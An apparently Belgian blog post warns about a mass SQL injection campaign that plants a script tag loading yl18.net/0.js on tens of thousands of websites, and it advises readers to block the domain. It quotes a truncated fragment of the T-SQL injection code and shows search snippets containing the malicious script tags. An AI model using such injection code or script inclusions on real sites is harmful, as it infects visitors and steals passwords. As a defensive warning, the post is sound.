also belgian sites infected with virus after hack
According to the Internet Storm center (the thing that our politicians don't want to set up in Belgian even if they agreed to put into the Telecom law - it is much more important to squabble about BHV while your critical communication infrastructure is being attacked inside out without having the capabilities to respond effectively) there is an important and dangereous infection and password stealing script being placed on more than 40.000 websites already. They are busy trying to mobilise everybody to clean it up, but I think you should do also your own part and protect your network and your server.
First you should block at your firewall and all other filters every connection to 18.net/0.js Do not hesitate to do this. It is absolutely necessary.
Secondly if you have a website, the attacks will for the moment use an SQL injection and this is the attack code
declare @m varchar(8000);
src="hxxp://yl 18.net/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
and this on as many pages of the website as it can find
The internet storm center calls on all ISP's to take out and clean up websites that are hijacked - injected with this code. In Belgium a simple Google trick already showed some Belgian sites being infected. DO NOT VISIT THEM.
Futurestep - a Korn/Ferry Comp<script src="http://yl18.net/0.js ...- [ Traduire cette page ] www.futurestep.be/ - 48k -
If you have a forum you should block all the script possibilities otherwise you will infect your users
|Research method presentation<script src="http://yl18.net/0.js"></script>, New Topic · Reply to |
www.psypress.com/student/forum/topic.asp?TOPIC_ID=69 - 14k
It is even being introduced as additional newspage on news sites as here and look at the name of the pageTechnology Group International<script src="http://yl18.net/0.js ...- [ Traduire cette page ]
The newest version of Enterprise 21 offers significant enhancements designed to improve
www.manubiz.com/channel/news.asp?news=H4ED8KE9 - 4k -
And it are domains from all over the world that are being attacked,
from tn (tunesia) to uk to org to com and so on
a google for the script shows 50.000 pages, this is already more than 10.000 new pages
since the Internet storm center launched its alert
I think this will be spreading even more and it seems that antiviruses aren't very effective for now
and if thought that professional sites had professional security, think again
|LEUVEN, Belgium, January 15 /PRNewswire/ -- "http://yl18.net/0.js">. Website:, http://www.organon.com ...|